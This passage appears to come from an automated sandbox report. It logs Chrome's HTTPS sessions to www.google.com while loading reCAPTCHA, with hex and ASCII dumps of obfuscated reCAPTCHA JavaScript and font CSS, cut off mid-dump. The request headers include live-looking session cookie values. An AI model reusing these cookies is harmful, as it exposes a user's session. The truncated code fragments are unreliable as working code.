2e 65 73 3d 66 28 64 2c Data Ascii: createScript(I)}:function(I){return""+I}}(X)(Array(7824*Math.random()\|0).join("\n")+'(function(){var zN=function(d,z,X,I,V,a){for(V=(I=(X=(z=m((a=d[da]\|\|{},d)),a.wk=m(d),a.N=[],d.T==d?(b(d)\|0)-1:1),m(d)),0);V<X;V++)a.N.push(m(d));for(a.Je=f(d,z),a.es=f(d,
2024-02-21 07:14:10 UTC	1252	IN	Data Raw: 7b 74 28 61 2c 64 29 2c 58 3d 64 2e 4c 7d 49 28 58 29 7d 65 6c 73 65 20 69 66 28 56 3d 3d 73 4b 29 7a 5b 33 5d 26 26 28 64 2e 58 3d 74 72 75 65 29 2c 7a 5b 34 5d 26 26 28 64 2e 55 3d 74 72 75 65 29 2c 64 2e 6f 28 7a 29 3b 65 6c 73 65 20 69 66 28 56 3d 3d 63 29 64 2e 58 3d 74 72 75 65 2c 64 2e 6f 28 7a 29 3b 65 6c 73 65 20 69 66 28 56 3d 3d 4a 53 29 7b 64 2e 58 3d 74 72 75 65 3b 74 72 79 7b 66 6f 72 28 58 3d 30 3b 58 3c 64 2e 75 2e 6c 65 6e 67 74 68 3b 58 2b 2b 29 74 72 79 7b 49 3d 64 2e 75 5b 58 5d 2c 49 5b 30 5d 5b 49 5b 31 5d 5d 28 49 5b 32 5d 29 7d 63 61 74 63 68 28 61 29 7b 7d 7d 63 61 74 63 68 28 61 29 7b 7d 28 30 2c 7a 5b 31 5d 29 28 66 75 6e 63 74 69 6f 6e 28 61 2c 6c 29 7b 64 2e 56 28 61 2c 74 72 75 65 2c 6c 29 7d 2c 28 64 2e 75 3d 5b 5d 2c 66 75 Data Ascii: {t(a,d),X=d.L}I(X)}else if(V==sK)z[3]&&(d.X=true),z[4]&&(d.U=true),d.o(z);else if(V==c)d.X=true,d.o(z);else if(V==JS){d.X=true;try{for(X=0;X<d.u.length;X++)try{I=d.u[X],I[0][I[1]](I[2])}catch(a){}}catch(a){}(0,z[1])(function(a,l){d.V(a,true,l)},(d.u=[],fu
2024-02-21 07:14:10 UTC	1252	IN	Data Raw: 6f 6e 28 49 29 7b 7a 2e 54 6f 28 49 29 2c 64 2e 54 6f 28 49 29 7d 2c 28 64 3d 28 7a 3d 6e 65 77 20 28 58 2e 70 72 6f 74 6f 74 79 70 65 2e 72 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 30 3d 3d 3d 74 68 69 73 2e 6e 29 72 65 74 75 72 6e 5b 30 2c 30 5d 3b 72 65 74 75 72 6e 5b 28 74 68 69 73 2e 57 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 49 2c 56 29 7b 72 65 74 75 72 6e 20 49 2d 56 7d 29 2c 74 68 69 73 2e 6e 29 2c 74 68 69 73 2e 57 5b 74 68 69 73 2e 57 2e 6c 65 6e 67 74 68 3e 3e 31 5d 5d 7d 2c 58 2e 70 72 6f 74 6f 74 79 70 65 2e 54 6f 3d 66 75 6e 63 74 69 6f 6e 28 49 2c 56 29 7b 28 74 68 69 73 2e 6e 2b 2b 2c 35 30 29 3e 74 68 69 73 2e 57 2e 6c 65 6e 67 74 68 3f 74 68 69 73 2e 57 2e 70 75 73 68 28 49 29 3a 28 56 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d Data Ascii: on(I){z.To(I),d.To(I)},(d=(z=new (X.prototype.rk=function(){if(0===this.n)return[0,0];return[(this.W.sort(function(I,V){return I-V}),this.n),this.W[this.W.length>>1]]},X.prototype.To=function(I,V){(this.n++,50)>this.W.length?this.W.push(I):(V=Math.floor(M
2024-02-21 07:14:10 UTC	1252	IN	Data Raw: 28 49 3d 76 6f 69 64 20 30 2c 7a 2e 46 29 56 3d 5a 72 28 7a 2e 46 2c 7a 29 3b 65 6c 73 65 7b 69 66 28 58 3d 66 28 7a 2c 34 32 34 29 2c 58 3e 3d 61 29 62 72 65 61 6b 3b 56 3d 66 28 7a 2c 28 49 3d 6d 28 28 55 28 32 31 31 2c 7a 2c 58 29 2c 7a 29 29 2c 49 29 29 7d 56 26 26 56 5b 78 5d 26 32 30 34 38 3f 56 28 7a 2c 64 29 3a 53 28 7a 2c 5b 6e 2c 32 31 2c 49 5d 2c 30 29 2c 51 28 7a 2c 64 2c 66 61 6c 73 65 2c 66 61 6c 73 65 29 7d 63 61 74 63 68 28 6c 29 7b 66 28 7a 2c 34 37 30 29 3f 53 28 7a 2c 6c 2c 32 32 29 3a 55 28 34 37 30 2c 7a 2c 6c 29 7d 69 66 28 21 64 29 7b 69 66 28 7a 2e 58 42 29 7b 45 4b 28 32 34 36 35 35 33 30 30 37 32 37 34 2c 28 7a 2e 42 2d 2d 2c 7a 29 29 3b 72 65 74 75 72 6e 7d 53 28 7a 2c 5b 6e 2c 33 33 5d 2c 30 29 7d 7d 63 61 74 63 68 28 6c 29 7b Data Ascii: (I=void 0,z.F)V=Zr(z.F,z);else{if(X=f(z,424),X>=a)break;V=f(z,(I=m((U(211,z,X),z)),I))}V&&V[x]&2048?V(z,d):S(z,[n,21,I],0),Q(z,d,false,false)}catch(l){f(z,470)?S(z,l,22):U(470,z,l)}if(!d){if(z.XB){EK(246553007274,(z.B--,z));return}S(z,[n,33],0)}}catch(l){
2024-02-21 07:14:10 UTC	1252	IN	Data Raw: 28 64 2c 7a 29 7b 72 65 74 75 72 6e 20 7a 3d 30 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 7a 3c 64 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 66 61 6c 73 65 2c 76 61 6c 75 65 3a 64 5b 7a 2b 2b 5d 7d 3a 7b 64 6f 6e 65 3a 74 72 75 65 7d 7d 7d 2c 53 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 7a 2c 58 2c 49 2c 56 2c 61 29 7b 69 66 28 21 64 2e 46 42 26 26 28 49 3d 76 6f 69 64 20 30 2c 7a 26 26 7a 5b 30 5d 3d 3d 3d 6e 26 26 28 49 3d 7a 5b 32 5d 2c 58 3d 7a 5b 31 5d 2c 7a 3d 76 6f 69 64 20 30 29 2c 56 3d 66 28 64 2c 34 34 38 29 2c 30 3d 3d 56 2e 6c 65 6e 67 74 68 26 26 28 61 3d 66 28 64 2c 32 31 31 29 3e 3e 33 2c 56 2e 70 75 73 68 28 58 2c 61 3e 3e 38 26 32 35 35 2c 61 26 32 35 35 29 2c 76 6f 69 64 20 30 21 3d 49 26 26 56 2e 70 75 73 68 28 49 26 32 35 35 Data Ascii: (d,z){return z=0,function(){return z<d.length?{done:false,value:d[z++]}:{done:true}}},S=function(d,z,X,I,V,a){if(!d.FB&&(I=void 0,z&&z[0]===n&&(I=z[2],X=z[1],z=void 0),V=f(d,448),0==V.length&&(a=f(d,211)>>3,V.push(X,a>>8&255,a&255),void 0!=I&&V.push(I&255
2024-02-21 07:14:10 UTC	1252	IN	Data Raw: 3d 30 2c 64 29 2c 49 29 3b 30 3c 47 3b 29 68 3d 56 25 38 2c 43 3d 38 2d 28 68 7c 30 29 2c 48 3d 56 3e 3e 33 2c 61 3d 7a 2e 48 5b 48 5d 2c 43 3d 43 3c 47 3f 43 3a 47 2c 58 26 26 28 4e 3d 7a 2c 42 3d 56 2c 4e 2e 44 21 3d 42 3e 3e 36 26 26 28 4e 2e 44 3d 42 3e 3e 36 2c 42 3d 66 28 4e 2c 33 38 39 29 2c 4e 2e 4c 65 3d 78 76 28 4e 2e 68 2c 5b 30 2c 30 2c 42 5b 31 5d 2c 42 5b 32 5d 5d 2c 4e 2e 44 29 29 2c 61 5e 3d 7a 2e 4c 65 5b 48 26 6c 5d 29 2c 4a 7c 3d 28 61 3e 3e 38 2d 28 68 7c 30 29 2d 28 43 7c 30 29 26 28 31 3c 3c 43 29 2d 31 29 3c 3c 28 47 7c 30 29 2d 28 43 7c 30 29 2c 47 2d 3d 43 2c 56 2b 3d 43 3b 72 65 74 75 72 6e 20 55 28 34 32 34 2c 28 58 3d 4a 2c 7a 29 2c 28 49 7c 30 29 2b 28 64 7c 30 29 29 2c 58 7d 2c 71 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 7a 2c 58 Data Ascii: =0,d),I);0<G;)h=V%8,C=8-(h\|0),H=V>>3,a=z.H[H],C=C<G?C:G,X&&(N=z,B=V,N.D!=B>>6&&(N.D=B>>6,B=f(N,389),N.Le=xv(N.h,[0,0,B[1],B[2]],N.D)),a^=z.Le[H&l]),J\|=(a>>8-(h\|0)-(C\|0)&(1<<C)-1)<<(G\|0)-(C\|0),G-=C,V+=C;return U(424,(X=J,z),(I\|0)+(d\|0)),X},q=function(d,z,X
2024-02-21 07:14:10 UTC	1252	IN	Data Raw: 29 7b 69 66 28 64 2e 46 29 72 65 74 75 72 6e 20 5a 72 28 64 2e 4f 2c 64 29 3b 72 65 74 75 72 6e 28 7a 3d 75 28 38 2c 64 2c 74 72 75 65 29 2c 7a 26 31 32 38 29 26 26 28 7a 5e 3d 31 32 38 2c 64 3d 75 28 32 2c 64 2c 74 72 75 65 29 2c 7a 3d 28 7a 3c 3c 32 29 2b 28 64 7c 30 29 29 2c 7a 7d 2c 77 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 7a 2c 58 2c 49 2c 56 29 7b 56 3d 74 68 69 73 3b 74 72 79 7b 52 73 28 49 2c 64 2c 7a 2c 74 68 69 73 2c 58 29 7d 63 61 74 63 68 28 61 29 7b 74 28 61 2c 74 68 69 73 29 2c 49 28 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 6c 28 56 2e 4c 29 7d 29 7d 7d 2c 6b 76 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 7a 29 7b 72 65 74 75 72 6e 20 64 28 66 75 6e 63 74 69 6f 6e 28 58 29 7b 58 28 7a 29 7d 29 2c 5b 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 7a Data Ascii: ){if(d.F)return Zr(d.O,d);return(z=u(8,d,true),z&128)&&(z^=128,d=u(2,d,true),z=(z<<2)+(d\|0)),z},w=function(d,z,X,I,V){V=this;try{Rs(I,d,z,this,X)}catch(a){t(a,this),I(function(l){l(V.L)})}},kv=function(d,z){return d(function(X){X(z)}),[function(){return z
2024-02-21 07:14:10 UTC	1252	IN	Data Raw: 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 61 29 3b 4b 28 74 72 75 65 2c 28 46 28 5b 28 46 28 5b 28 46 28 28 59 28 66 75 6e 63 74 69 6f 6e 28 42 29 7b 55 4b 28 34 2c 42 29 7d 2c 34 31 35 2c 28 28 59 28 66 75 6e 63 74 69 6f 6e 28 42 2c 4a 2c 48 2c 43 2c 47 2c 4e 2c 68 2c 41 2c 4d 2c 4c 2c 72 2c 45 29 7b 66 75 6e 63 74 69 6f 6e 20 52 28 70 2c 57 29 7b 66 6f 72 28 3b 4e 3c 70 3b 29 72 7c 3d 62 28 42 29 3c 3c 4e 2c 4e 2b 3d 38 3b 72 65 74 75 72 6e 20 57 3d 72 26 28 28 4e 2d 3d 70 2c 31 29 3c 3c 70 29 2d 31 2c 72 3e 3e 3d 70 2c 57 7d 66 6f 72 28 4c 3d 28 48 3d 28 72 3d 28 68 3d 6d 28 42 29 2c 4e 3d 30 29 2c 47 3d 28 52 28 33 29 7c 30 29 2b 31 2c 52 28 35 29 29 2c 5b 5d 29 2c 4a 3d 45 3d 30 3b 45 3c 48 3b 45 2b 2b 29 4d 3d 52 28 31 29 2c 4c 2e 70 75 73 68 28 4d 29 Data Ascii: fromCharCode(a);K(true,(F([(F([(F((Y(function(B){UK(4,B)},415,((Y(function(B,J,H,C,G,N,h,A,M,L,r,E){function R(p,W){for(;N<p;)r\|=b(B)<<N,N+=8;return W=r&((N-=p,1)<<p)-1,r>>=p,W}for(L=(H=(r=(h=m(B),N=0),G=(R(3)\|0)+1,R(5)),[]),J=E=0;E<H;E++)M=R(1),L.push(M)
2024-02-21 07:14:10 UTC	1252	IN	Data Raw: 4e 3d 66 28 28 4a 3d 66 28 28 4a 3d 28 47 3d 6d 28 28 68 3d 6d 28 28 4e 3d 6d 28 42 29 2c 42 29 29 2c 42 29 29 2c 6d 29 28 42 29 2c 42 29 2c 4a 29 2c 42 29 2c 4e 29 2c 42 29 2c 47 29 2c 68 3d 66 28 42 2c 68 29 2c 22 6f 62 6a 65 63 74 22 29 3d 3d 69 44 28 4e 29 29 7b 66 6f 72 28 48 20 69 6e 20 43 3d 5b 5d 2c 4e 29 43 2e 70 75 73 68 28 48 29 3b 4e 3d 43 7d 69 66 28 42 2e 54 3d 3d 42 29 66 6f 72 28 42 3d 30 2c 47 3d 30 3c 47 3f 47 3a 31 2c 48 3d 4e 2e 6c 65 6e 67 74 68 3b 42 3c 48 3b 42 2b 3d 47 29 68 28 4e 2e 73 6c 69 63 65 28 42 2c 28 42 7c 30 29 2b 28 47 7c 30 29 29 2c 4a 29 7d 7d 2c 28 59 28 66 75 6e 63 74 69 6f 6e 28 42 29 7b 6d 76 28 42 2c 34 29 7d 2c 35 30 34 2c 28 59 28 66 75 6e 63 74 69 6f 6e 28 42 2c 4a 2c 48 2c 43 2c 47 29 7b 28 47 3d 66 28 42 2c Data Ascii: N=f((J=f((J=(G=m((h=m((N=m(B),B)),B)),m)(B),B),J),B),N),B),G),h=f(B,h),"object")==iD(N)){for(H in C=[],N)C.push(H);N=C}if(B.T==B)for(B=0,G=0<G?G:1,H=N.length;B<H;B+=G)h(N.slice(B,(B\|0)+(G\|0)),J)}},(Y(function(B){mv(B,4)},504,(Y(function(B,J,H,C,G){(G=f(B,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49727	142.250.65.228	443	7220	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-21 07:14:10 UTC	1457	OUT	GET /recaptcha/api2/webworker.js?hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: same-origin Sec-Fetch-Dest: worker Referer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b&co=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbTo0NDM.&hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&size=normal&s=xz3LsDhnVKWNDPAxYsfSai-65gQfUWB55L8TFubhcQqJlrltbCH3uiMgqw9QAslta7P_yQ2bZH1ORXgoYVB-hTK_zEC7bXvNca4AZA-u_gcND1aHqzQAuQdE8YR_32tCw2qLxz-xd4-Z3Nm9D50Nbwkns7louT2dRkQLmWk-2Dn-QozQIbnlAs_c6yUIm5PKVMMSXO7KlIPqv21jVxvuhA6gVzHJJcirmiwhSjBz4o70vFTT38JJB0MyLvqVTg1YM6Qx6WiknHHxvIM6RlgthjUDYRm3_PM&cb=px5dhzo8o1yu Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
2024-02-21 07:14:10 UTC	655	IN	HTTP/1.1 200 OK Content-Type: text/javascript; charset=utf-8 Cross-Origin-Embedder-Policy: require-corp Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]} Expires: Wed, 21 Feb 2024 07:14:10 GMT Date: Wed, 21 Feb 2024 07:14:10 GMT Cache-Control: private, max-age=300 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Security-Policy: frame-ancestors 'self' X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-02-21 07:14:10 UTC	108	IN	Data Raw: 36 36 0d 0a 69 6d 70 6f 72 74 53 63 72 69 70 74 73 28 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 79 69 4e 57 33 52 39 6a 6b 79 4c 56 50 35 2d 45 45 5a 4c 44 7a 55 74 41 2f 72 65 63 61 70 74 63 68 61 5f 5f 65 6e 2e 6a 73 27 29 3b 0d 0a Data Ascii: 66importScripts('https://www.gstatic.com/recaptcha/releases/yiNW3R9jkyLVP5-EEZLDzUtA/recaptcha__en.js');
2024-02-21 07:14:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49729	142.250.65.228	443	7220	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-21 07:14:11 UTC	1367	OUT	GET /recaptcha/api2/bframe?hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGL7F1q4GIjBwAWbomQLbaJKyWdrTAZ9MKsU5Vq2-V7iqyHfa4-ZPY5fgDT5PQDrRGB3-eVas0UEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
2024-02-21 07:14:11 UTC	891	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Embedder-Policy: require-corp Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]} Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 21 Feb 2024 07:14:11 GMT Content-Security-Policy: script-src 'report-sample' 'nonce--cPuZws0AyfJ2EwKWZy24Q' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/recaptcha/1 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-02-21 07:14:11 UTC	361	IN	Data Raw: 31 64 30 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 3c 74 69 74 6c 65 3e 72 65 43 41 50 54 43 48 41 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 Data Ascii: 1d0d<!DOCTYPE HTML><html dir="ltr" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>reCAPTCHA</title><style type="text/css">/* cyrillic-ext */@font-face
2024-02-21 07:14:11 UTC	1252	IN	Data Raw: 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 32 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 34 36 30 2d 30 35 32 46 2c 20 55 2b 31 43 38 30 2d 31 43 38 38 2c 20 55 2b 32 30 42 34 2c 20 55 2b 32 44 45 30 2d 32 44 46 46 2c 20 55 2b 41 36 34 30 2d 41 36 39 46 2c 20 55 2b 46 45 32 45 2d 46 45 32 46 3b 0a 7d 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f Data Ascii: to/v18/KFOmCnqEu92Fr1Mu72xKOzY.woff2) format('woff2'); unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//
2024-02-21 07:14:11 UTC	1252	IN	Data Raw: 46 39 2c 20 55 2b 32 30 41 42 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 47 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 30 2d 30 32 41 46 2c 20 55 2b 30 33 30 34 2c 20 55 2b 30 33 30 38 2c 20 55 2b 30 33 32 39 2c Data Ascii: F9, U+20AB;}/* latin-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu7GxKOzY.woff2) format('woff2'); unicode-range: U+0100-02AF, U+0304, U+0308, U+0329,
2024-02-21 07:14:11 UTC	1252	IN	Data Raw: 39 30 2d 30 34 39 31 2c 20 55 2b 30 34 42 30 2d 30 34 42 31 2c 20 55 2b 32 31 31 36 3b 0a 7d 0a 2f 2a 20 67 72 65 65 6b 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 45 55 39 66 43 42 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 31 46 30 30 2d 31 46 46 46 3b 0a 7d Data Ascii: 90-0491, U+04B0-04B1, U+2116;}/* greek-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 500; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fCBc4EsA.woff2) format('woff2'); unicode-range: U+1F00-1FFF;}
2024-02-21 07:14:11 UTC	1252	IN	Data Raw: 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 45 55 39 66 42 42 63 34 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 30 30 30 2d 30 30 46 46 2c 20 55 2b 30 31 33 31 2c 20 55 2b 30 31 35 32 2d 30 31 35 33 2c 20 55 2b 30 32 42 42 2d 30 32 42 43 2c 20 55 2b 30 32 43 36 2c 20 55 2b 30 32 44 41 Data Ascii: */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 500; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2) format('woff2'); unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA
2024-02-21 07:14:11 UTC	1252	IN	Data Raw: 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 59 55 74 66 42 78 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 33 37 30 2d 30 33 37 37 2c 20 55 2b 30 33 37 41 2d 30 33 37 46 2c 20 55 2b 30 33 38 34 2d 30 33 38 41 2c 20 55 2b 30 33 38 43 2c 20 55 2b 30 33 38 45 2d 30 33 41 31 2c 20 55 2b 30 33 41 33 2d 30 33 46 46 3b 0a 7d 0a 2f 2a 20 76 69 65 74 6e 61 6d 65 73 65 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c Data Ascii: 